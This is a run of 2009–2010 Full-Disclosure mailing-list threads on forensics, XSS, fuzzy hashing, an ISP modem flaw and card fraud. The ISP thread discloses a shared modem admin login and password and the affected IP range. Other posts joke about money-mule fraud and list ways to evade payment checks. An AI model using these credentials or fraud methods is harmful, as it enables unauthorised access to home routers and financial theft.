where the data came from. -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Unknown malware? Infections recently deleted by A/V? The realm of data ownership is ridiculous. If I run an wifi AP with WEP or no auth, my router keeps no logs, and my computer is a host to malware then I would imagine that I cannot be convicted of a computer crime without verification by physical surveillance. If given the choice by a lawyer between pleading guilty and receiving a lenient punishment and pleading not-guilty to certain loss for severe punishment in the face of 'irrefutable' evidence most people will choose to plead guilty. Prosecutors, Lawyers, and defendants are largely either ignorant or apathetic to the issues around proving culpability in computer-crime. And case law would back me up. -Travis On Tue, Jan 26, 2010 at 3:11 AM, Charles Skoglund charles.skogl...@bitsec.se wrote: This discussion is getting weirder and weirder. If an examiner finds evidence on YOUR computer / cell phone / usb disks / whatever, please do tell me how it's not necessarily yours? By claiming your computer has been hacked? You do know an examiner usually knows how to double-check your story for malicious code right? Or what are you guys talking about? My experience is that when I find the evidence, the person/s being investigated confesses quite rapidly. Cheers! On 1/26/10 4:31 AM, Bipin Gautam bipin.gau...@gmail.com wrote: So to the point, the techniques of forensic examiners were flawed from day one given that any text/evidence found on your computer is NOT NECESSARILY yours! Does that break digital forensics? oops. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes
Do you really want to be buying an entire operating system from somebody who just admitted they can't even produce a workable browser with all their resources? Valdis makes the novice assumption that people consider valuations of this sort when buying the newest iteration of Microsoft products. The idea that consumers would actually consider an alternative to what is an effectively locked in platform is laughable. The suggestion that they might find such a move to be of any relevance or impact on their purchasing decision is insane. On Wed, Jan 20, 2010 at 1:00 PM, valdis.kletni...@vt.edu wrote: On Wed, 20 Jan 2010 10:38:34 EST, James Matthews said: Why doesn't microsoft throw some of it's weight behind Mozilla and ditch IE forever. It doesn't suit their image. Unfortunately, the PR doesn't work that way. Do you really want to be buying an entire operating system from somebody who just admitted they can't even produce a workable browser with all their resources? (Note this works differently in the Linux world, where the kernel crew doesn't even pretend to write browsers, and the Firefox crew *just* does browsers, and somebody else *just* does OpenOffice, and distros (for the most part) just worry about integration issues, and everybody only claims to do their little part well) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MouseOverJacking attacks
Hello MustLive! Thanking you for taking a personal approach to all of your list admirers! Prosperous futures abound! A missive granted in thy honor sweet prince of XSS. On Sun, Jan 17, 2010 at 4:33 PM, MustLive mustl...@websecurity.com.ua wrote: Hello Travis! Thanks for your attention to my article about MouseOverJacking attacks. If you read the HTML specification you can find all sorts of XSS attack vectors that people just assumed would be redundant to write entire articles on! Yes, I'm familiar with HTML specification (as web developer from beginning of 1999) and I know about different events in HTML. And as web security professional I know a lot of XSS vectors. Many of events in HTML are not widespread enough (or not usable enough) for XSS attacks to write entire articles about them, but such ones as onclick and onmouseover are those which worth entire articles. There were said a lot about attacks via onclick in 2008, so I decided to said about onmouseover in 2009 (because it worths it). P.S. Because Jeff is already in my blacklist, as I mentioned to the list, so in the future no need to send me his letters. If you'll decide to answer me, than write me directly. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: T Biehn tbi...@gmail.com To: Jeff Williams jeffwilli...@gmail.com Cc: MustLive mustl...@websecurity.com.ua; full-disclosure@lists.grok.org.uk Sent: Tuesday, January 05, 2010 4:53 PM Subject: Re: [Full-disclosure] MouseOverJacking attacks Hey MustLive! If you read the HTML specification you can find all sorts of XSS attack vectors that people just assumed would be redundant to write entire articles on! Here! http://www.w3.org/TR/REC-html40/interact/scripts.html -Travis On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams jeffwilli...@gmail.com wrote: Thanks for your wishes MustDie; Do you consider yourself as an oz XSS ninja ? Did your C.V. ended in the OWASP trash bin ? And how the fuck you came up with a nickname like that ? Let us know, we truly give a shit about your life, and xss. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Tool] DeepToad 1.1.0
Hmm, Wouldn't it be more useful to the sec community to have a algorithm that abstracts at the -interpreted- content level? That is when analyzing binaries I wouldn't think that this would classify two with near identical functionality together, even though it is removing a significant chunk of information during the hash pass. I would largely assume that your algorithm, as is, works best on uncompressed bitmaps. Is there something I'm missing? -Travis On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret joxeanko...@yahoo.es wrote: Hi all, I'm happy to announce the very first public release of the open source project DeepToad, a tool for computing fuzzy hashes from files. DeepToad can generate signatures, clusterize files and/or directories and compare them. It's inspired in the very good tool ssdeep [1] and, in fact, both projects are very similar. The complete project is written in pure python and is distributed under the LGPL license [2]. Links: Project's Web Page http://code.google.com/p/deeptoad/ Download Web Page http://code.google.com/p/deeptoad/downloads/list Wiki http://code.google.com/p/deeptoad/w/list References: [1] http://ssdeep.sourceforge.net/ [2] http://www.gnu.org/licenses/lgpl.html Regards Happy new year! Joxean Koret ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MouseOverJacking attacks
Hey MustLive! If you read the HTML specification you can find all sorts of XSS attack vectors that people just assumed would be redundant to write entire articles on! Here! http://www.w3.org/TR/REC-html40/interact/scripts.html -Travis On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams jeffwilli...@gmail.com wrote: Thanks for your wishes MustDie; Do you consider yourself as an oz XSS ninja ? Did your C.V. ended in the OWASP trash bin ? And how the fuck you came up with a nickname like that ? Let us know, we truly give a shit about your life, and xss. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Tool] DeepToad 1.1.0
I can see what you're saying, it could be useful for finding differences in different versions of the same binary but from what I can see Joxean's app is meant to group files of the same 'type,' not provide 'diff' capabilities. -Travis On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky d...@doxpara.com wrote: I looked into a fair amount of this sort of normalization back when I was playing with dotplots. The idea was to upgrade from simple Levenshtein string comparison (with no knowledge of variable length x86 instructions, pointers that shift from compile to compile, etc) to something with at least some domain specific knowledge. What I found, somewhat surprisingly, was that dumb string comparison was more than enough. In fact, when I compared pre-patch and post-patch builds, it was easy to directly see when content was added, removed, shifted in location, etc. Joxean's going to have much the same result -- as basic as his similarity metric is, he'll get the broad strokes just fine. Ultimately the best approach is to build a graph of how functions interact and measure graph isomorphism, but of course Halvar figured that out years ago :) On Tue, Jan 5, 2010 at 3:41 PM, T Biehn tbi...@gmail.com wrote: Hmm, Wouldn't it be more useful to the sec community to have a algorithm that abstracts at the -interpreted- content level? That is when analyzing binaries I wouldn't think that this would classify two with near identical functionality together, even though it is removing a significant chunk of information during the hash pass. I would largely assume that your algorithm, as is, works best on uncompressed bitmaps. Is there something I'm missing? -Travis On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret joxeanko...@yahoo.es wrote: Hi all, I'm happy to announce the very first public release of the open source project DeepToad, a tool for computing fuzzy hashes from files. DeepToad can generate signatures, clusterize files and/or directories and compare them. It's inspired in the very good tool ssdeep [1] and, in fact, both projects are very similar. The complete project is written in pure python and is distributed under the LGPL license [2]. Links: Project's Web Page http://code.google.com/p/deeptoad/ Download Web Page http://code.google.com/p/deeptoad/downloads/list Wiki http://code.google.com/p/deeptoad/w/list References: [1] http://ssdeep.sourceforge.net/ [2] http://www.gnu.org/licenses/lgpl.html Regards Happy new year! Joxean Koret ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security hole on local ISP
This is an orgiastic dump of information, you must really hate ETB; or you must be really excited for lulz. -Travis On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo cpretelga...@yahoo.com wrote: I've recently discovered a security hole on the modems (which double as routers) used by a Colombian ISP - ETB. It so happens that all incoming connections to an IP address on said ISP on port 23 or port 80 land on the modem instead of the computer(s) connected to it. Even if one tries to redirect those ports to a local machine, the modem still gets all the connections on those ports. Also, connections on ports 23 and 80, from any IP address, will access the modem configuration options. Last year that could be done only from private IP addresses (i.e. 192.168.0/24), but now it can be done, as I said, from anywhere. I've been told that a few lucky users were able to forward port 80, but in that case, it's port 8080 that is intercepted by the modem. The end result is that anyone, from anywhere, can access the modem of anyone on ETB to mess up their configuration (e.g. obtaining and changing the client's username and password, permanently disconnecting them from the internet, and so on) - that is, if they have the administration password. Unfortunately, ETB uses the same login/password on all of their modems since 2006, which are publicly available on the web. Login: Administrator Password: soporteETB2006 The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that range where ports 80 and 23 are open is most likely a wide open ETB modem. Apparently, this issue has been repeatedly reported to ETB, but it always falls on deaf ears. They seem to think this is no big deal since nobody knows the username and password for the modems - which is not the case, and even if it were, they would be easily crackable by brute force. Peace, -Cilia ¡Obtén la mejor experiencia en la web! Descarga gratis el nuevo Internet Explorer 8. http://downloads.yahoo.com/ieak8/?l=e1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security hole on local ISP
This is a hiroshima versus 'harmless' mountain demonstration debate, Lee. Because the post includes the raw data including ports, passwords and ranges one must assume that Cilia Pretel Gallo was appealing to the lowest common denominator, to a group of individuals where checking NRO whois db for ETB's netblocks would not be an obvious first step. Ahem. -Travis On Tue, Dec 29, 2009 at 11:36 AM, Lee ler...@gmail.com wrote: On Tue, Dec 29, 2009 at 10:23 AM, T Biehn tbi...@gmail.com wrote: This is an orgiastic dump of information, you must really hate ETB; or you must be really excited for lulz. or you're hoping that full disclosure will get ETB to fix the problem. Regard, Lee -Travis On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo cpretelga...@yahoo.com wrote: I've recently discovered a security hole on the modems (which double as routers) used by a Colombian ISP - ETB. It so happens that all incoming connections to an IP address on said ISP on port 23 or port 80 land on the modem instead of the computer(s) connected to it. Even if one tries to redirect those ports to a local machine, the modem still gets all the connections on those ports. Also, connections on ports 23 and 80, from any IP address, will access the modem configuration options. Last year that could be done only from private IP addresses (i.e. 192.168.0/24), but now it can be done, as I said, from anywhere. I've been told that a few lucky users were able to forward port 80, but in that case, it's port 8080 that is intercepted by the modem. The end result is that anyone, from anywhere, can access the modem of anyone on ETB to mess up their configuration (e.g. obtaining and changing the client's username and password, permanently disconnecting them from the internet, and so on) - that is, if they have the administration password. Unfortunately, ETB uses the same login/password on all of their modems since 2006, which are publicly available on the web. Login: Administrator Password: soporteETB2006 The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that range where ports 80 and 23 are open is most likely a wide open ETB modem. Apparently, this issue has been repeatedly reported to ETB, but it always falls on deaf ears. They seem to think this is no big deal since nobody knows the username and password for the modems - which is not the case, and even if it were, they would be easily crackable by brute force. Peace, -Cilia ¡Obtén la mejor experiencia en la web! Descarga gratis el nuevo Internet Explorer 8. http://downloads.yahoo.com/ieak8/?l=e1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Global warming - it's all about the money
There are no fundamental truths. That's the only axiom you can really rely on. The acceptance of this fact is the first on the road to enlightenment... or Schizophrenia. Thats all for now, the suited men from a 1950's spy flick are watching me from a vintage crown vic. Joke's on them, I've dressed my hair in petroleum jelly. -Travis On Sat, Dec 19, 2009 at 4:57 PM, Stephen Mullins steve.mullins.w...@gmail.com wrote: ...it's hard to know what's true in the comings and goings of men throughout the world Follow the money. On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott jared.dem...@harris.com wrote: Paul Schmehl wrote: http://www.wnd.com/index.php?fa=PAGE.viewpageId=118953 Businesses hold world hostage over carbon credits Even U.N. climate chief tied to new, 'green' extortion scam It was never about the climate. Not sure about all that, but it is sad that it's hard to know what's true in the comings and goings of men throughout the world. Fortunately there are fundamental Truths you can hang your hat on. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]
Any hexadecimally represented 16 bytes is obviously an MD5. For those interested in finding signal where there is none: LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes. On Tue, Dec 1, 2009 at 2:52 PM, McGhee, Eddie eddie.mcg...@ncr.com wrote: N3td3v i am Scottish and coming for you're boxes In yer area wee man. Fjeer. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of genesis project Sent: 01 December 2009 19:47 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] BEGIN TRANSMISSION 7040dc5b9583e367068a06f25a7bce8a 93e085c3571947bb935af4c8e62df42e bd9859da693421728921176693226dbb 27d4a0a73b79efc8f229e709bf9c5858 b49b4e3ece77173db3a3ce246f31ba56 bfca9db2ba007b1c44e5fca8b8f05a0e 0da3451c72565616d07010df1b241737 0a6857b1895b228050776841b32affd6 4f47f89f28926ef6ea7300537664cbe4 760cebf1739ed06bb89f20ab3eb2f811 d3f949c42963ad5d5628bfdf75c374e3 93be00d1f1f8699f11a196c5d331d03a 1787abb29dc4727cc16b3fee8a2e92cb 6282f38dc06e7932c4f4b3c848d71e08 6ba17f76a3b93f26a42abaa1e631c0e3 39784740bbf93b2b83b0c58403943ee8 b5bf1ef91072822b2675945d4fc3bc59 d38bac3fcaedaed11fb3f1273248fbe0 e1315c4290e7af09ad8532f40842ab21 958ace1fe31a29df9e0ae7def01a72e9 1ea95dfa189f03e723d800a14740197c 987205d906e98d1e23c46659bfeb389a 5286827e25643a66b0d4823ee492004a 2481d318d6ea2ea2af10af64d2203ac6 02a3c07ae1f9662d4375d6586e6cce97 b7095f8e8a4e0a4bbc1155ef2c495b4f af671a4192a4ac0732da175185cb690c e5a48398e8bf9a9fe274421ea48e532d e95961cf8f47623bab5e3be8541c7aea b8f76f41598302462affd1fb917818b3 df89576229f264ae2c7aebd92f3eb5c1 ee6271d6d6f4dadd9d93f265446898d7 76763d316ec90789ae9ed3bda0f260b0 fd945157f527a52ce78b37a662ba3ae2 65845c483be88ac1b5be34cb4a39a062 b30f718f101a3967e471ae8827e8e2f2 3ad2e2f177788d06b6ddedf01d641864 c19975a84d2915d7de2e5aaca973aff3 268cbcea00e2ac78f497e3c40b5d6d16 baa6552f904cfe608733a290fb3b0348 8cef9785397784af320aad64d4a451fa 1185b5a82873f3b6a7af2e80b7000819 3a4af85f5803b75265e9d8483b311858 8d5ab13bf268d5af676f8d21b6463088 2a1c3be1c1fea0bb80a1242732f52003 1a052508cb706d60f970fc0b31929e2d 5c2a7806346bcd89a24678fa0e556b24 c34ea7f66d8adda39ab4d31a293944c5 2dfb7c91e7debc2c47028abba9878b8e a83842d1970b8b9361b28994bdea133e 9988fe16e6783b97f30dae9879b43108 f7c2adcf3501371516b5cd7c41afade0 3f92a19b63644fab656f38413ab99f49 bc3afe9ce52461a1a48203ad832b04da dca51c6e633166ad7361086ae604bc9e 3f02d51fa412af42fc8569a416a992b8 342c8599434faee181456f5ba1ecb89c 936f1f7c562f1d62383981f727770724 5e99612e8301260b3fe3f4310b301d69 dd5810c0a8b60b34c423dee8383323bc 001ebe4cfff9e32ef4ee19137485a2cd 8f5b148e2c3edcfc82f6b225a8642383 ca00bd55ba0164405edd8965f0f527be 83b70c007d10927fce8be15cd387e19f 10248928399d1a23d543a12fa2ce55f3 597e73653a1798f6c7ae859e6bcbb0af 50f6f302cdf09f97c35feb22353b7df5 f726a9833d6cb765241f5b5407c75aff 958ace1fe31a29df8b8df3134373bee0 1f6a7b08e47d947e0e5641802c9e4af6 666925ac26c0df66038ec6a2b05df1ff 6d3f62a326e6685a505463353c8f5dc3 58d29e01339ce1ebc04db879e36be2a1 f089a9ab5b3404d9e2dd14857a49fc15 cd7545c0c1c0ccaa220b8eb542a50a09 b984f08075ac64b29d0e0f06fbae8427 b2daa21b13c410b5265d2e4398365f2b f8b6f1db0c9b44adf497e3c40b5d6d16 e0603724697cc1c0c119adf3c4c2fbc3 3ddf0c148fee11380606ca727bc419e7 41e6e4a81e4e27411eee1fe5f0da834b 81079622b23ce42817262bbbdcde38c9 209d1e47a7bcb71d813b58bf4809881e 1488a239d560d41d987af10a94a1ecab fe20ecdaf9c90ec04ce346d85aed6d91 c32ee9c5be9c64cecef763decfad4dca 2907176aac354b46ebfec5d51a3f5294 cb53a79af06450347c2f041f78c73aa9 a3ecabc26e17d9213f92a19b63644fab 79ba44f07337f89707282e178959d582 3915966def8d5939b3dcaa99a0f63dfb 55ef531b7722a7f847183bb5cd62b448 2cbd414bdf1769637f121cafb1a4e42c 3f92a19b63644fab686ef611d64d4641 93bde960aca5996742dcf0680fee7558 9c3d2204d817bd95bbc5031eb85239a4 ad3b70730307b0924c3caf13dc6696fb de091866bed93da6582cbff43b18ad70 34c370a3e5eefb81290eebf586d15184 2871985cdc38e885b16836e8598f98c3 3aa1f46ba0b2e10ff1fe16987ab96eea f4894f0f34ab1e64d7461fb1bf45342f e221c95c7502b1d1a8a3cdc2cf7bd7aa 2012c9af47d83a325e1d0ccff62e6f64 654f6e35ce564578b242ade81f1a56ef 3bc2d195600ec07a0e16b72f946bcb5d 16f5408569724cd19b6bd8deb9070a7e e52e66188a45d27c4b6dc31ae3b202df c218181a6b95baf8c9331e3d07d06dde 83b66338d7bb3f5e4065fb8fa70656ca 4a1b0b72f02795fa3f92a19b63644fab 0df1df0e0383002a5988938195dbb95f 2a98945ce29d90a761f21d49a9fcaaff aa69c6e314fe570da60f9889f9b3f5b7 0ef3c0e63d60af7bf7bdbad9a56f92c1 e3304feb10c583e0414961201ead7711 dc4bf95b9e80405f0e5baa8088f200da 20d77139485e7dcb6f6802b339a56f44 a3bbcef064dcc7b317ee3b975ef28472 76561a553f3dd6908aa898fb892c4238 8853bd85b9c969c0bb0deabf92b01aab 35ba007891228128afdcaeaf3c75f4e7 955b6f31ad3bef73f204e86b358dc297 ea0ec008244731b21d8ef6c5e7e91dcc d7a9f71371167a91ad54212902f79cea 293c912e8749701beb0ec4c5946e41a8
Re: [Full-disclosure] when I grow up
Can't you make a good hunk of low-risk cash by 'pretending' to be a money mule? (Profile: 20s, looking for 'easy' work.) -Travis On Tue, Oct 6, 2009 at 8:40 AM, RandallM randa...@fidmail.com wrote: ...when I grow up Daddy, I want to be a Money Mule! -- been great, thanks a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when I grow up
VK, obviously you don't own the account you have them send the money to. You just happen to have an 'entangled' ATM card. -Travis On Tue, Oct 6, 2009 at 11:00 AM, valdis.kletni...@vt.edu wrote: On Tue, 06 Oct 2009 10:46:19 EDT, T Biehn said: Can't you make a good hunk of low-risk cash by 'pretending' to be a money mule? (Profile: 20s, looking for 'easy' work.) Stealing from the old Mafia wasn't so bad. If you got caught, it was usually just business and they dispatched you in the most economical way feasible. These days, the field is dominated by crazy and rutheless South American drug cartels, ruthless and crazy Asian Yakuza-like gangs, and *really* crazy, ruthless, psycopathic gangs from the Ukraine. Low risk? Hardly. -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chargebacks and credit card frauds
Prepaids can be had in the US and Canada sans ID. Fake IDs cheap, easy to get. DIDs are cheap, usually free. How many of those nett'd households have VoIP phone service? Hijack inbounds for re-routing to your own (free) SIP server provider? Implementing some sort of automated call verification service is expensive, CBA? Credit cards are insecure, you're playing cat and mouse games until your checks become too invasive for end consumers. Perhaps you insist on a verifying payment gateway and flag all other transactions for manual processing in addition to adding new lists for IP checks. Glorious, -Travis On Wed, Sep 23, 2009 at 11:47 AM, Anıl Kurmuş akur...@gmail.com wrote: As others have mentioned, you have to assume the machines are compromised. This means you should use another channel for authorization of each transaction (depending on the use of your website, only authenticating the user through this channel could be enough but this is more risky and vulnerable). I would say the most cost effective one is probably to use SMS/cell phones. You would send an SMS with the transaction details and a verification code to be entered on the website for finalizing the transaction. If the state/country given by the phone number doesn't match the billing address, you throw a red flag as you did before. So if an adversary wanted to cheat, he would need to enter a cell phone from the same region/country. Assuming he can find infested machines in the same country, this is not really difficult, still it's new and makes it harder. Of course, the main advantage is that in many countries, it's not easy nowadays to get a prepaid cell phone without giving any IDs for instance, so this might act as a deterrent. A better (but more expensive and slower) solution though would be to authenticate the cell phone number through postal mail at setup time/when changing the cell number. Anıl Kurmuş --- GPG Key : http://perso.telecom-paristech.fr/~kurmus/key On Tue, Sep 22, 2009 at 06:26, Steven Anders anders...@gmail.com wrote: Hi everyone, I work as an engineer at an online company that sells online subscription service for online tool. We accept orders online using credit cards numbers and we use Authorize.net to process credit card payments. Our standard operating procedure for online orders are: normal checks are check for billing address and IP address , - we make sure the billing address is a match and the IP address geo location is good (meaning, it is pretty close to the billing city or state). We use a service called MaxMind and we check to make sure that the IP address geo location is in proximity to the billing address. From our experience, another big red flag is if the IP is from a proxy server, or from web hosting company (could be SSH tunnelling), or outside USA ( Russia, Estonia, China, etc ) If these checks throw a red flag, we will call the person to confirm the order. With this process, we pretty much has very low fraud rate. Lately, in past couple months, we've been receiving a lot of orders that bypass all these checks without any glitch. The AVS (Address verification service pass) checks for the billing addresses and the IP addresses are good (in proximity to the billing address). The IP addresses are near the billing addresses (for example: billing address is Chicago, IL and the IP address is Evanston, IL - a couple miles from Chicago). Only a few weeks later, we have an influx of chargebacks and phone calls from the original owners of the credit cards, since these people never ordered it - and they are all fraudulent orders. The only similar patterns in all these orders is that: 1) they use free email accounts (from Yahoo , Hotmail, etc) . 2) All the IPs are from ISPs such as Sbcglobal, Comcast, Cox Communications, etc . My big question is: I know there are all kinds of ways people could obtain stolen credit card numbers, and their billing addresses, and so forth. But. I was wondering: 1. how do they place the orders using all the legit IPs - since all the IPs are from Sbcglobal , Cox communications, and all the other major ISPs near the billing addresses. Could it be that they actually took control of the PCs and then steal the credit card, and then place the order remotely from the controlled PC? 2. Any insights on how these fraudsters obtain the stolen credit card numbers? I am now tasked with improving our backend checks to make sure we don't have any more fraudulent order, and would appreciate any pointer or insights into this matter. Any theories, insights, or information would be very useful. Thank you all for your time in advance. steve ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chargebacks and credit card frauds
You could run IP against spam bl's, ISC lookup, dronebl, proxybl for flagging. -Travis On Tue, Sep 22, 2009 at 2:36 PM, Steven Anders anders...@gmail.com wrote: Thanks Andrew for the suggestion. Yes, it does make sense to do all the checks you described. These days, as manual process, we just make a phone call and do a follow-up email. We ask for a copy of the credit card to be faxed and a proof of ID. Many times the fraudsters do a reply with very bad English - sometimes it is funny. And you're right - a lot of the orders are placed on non working hours. On Mon, Sep 21, 2009 at 10:29 PM, Andrew Haninger ahan...@mindspring.com wrote: On Tue, Sep 22, 2009 at 12:26 AM, Steven Anders anders...@gmail.com wrote: I am now tasked with improving our backend checks to make sure we don't have any more fraudulent order, and would appreciate any pointer or insights into this matter. Any theories, insights, or information would be very useful. I have three ideas. Two are quite complicated and the other a little simpler. None are fraud-proof. Some may be impractical if your work is being done after the fact. 1) Have a robot call or text the customer a CAPTCHA-type string to enter into a website. Workaround: Register a cell phone or VoIP number in the victim's area code and take the call. You could possibly require a hard-wire landline, but those are becoming so uncommon that it would create trouble for many of your customers. And then there are those darned dialup users. Perhaps do this only after a first offense. Though, I'm guessing fraudsters only use the accounts once and then avoid them. 2) Have a Flash or Java applet check for common remote desktop servers running on the ordering PC. Workaround: Disguise the server software as something harmless, if it isn't already. 3) Check to see if the order was placed outside normal waking hours or during normal working hours. Workaround: Not hard to work around, but might hassle the criminals. Andy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and 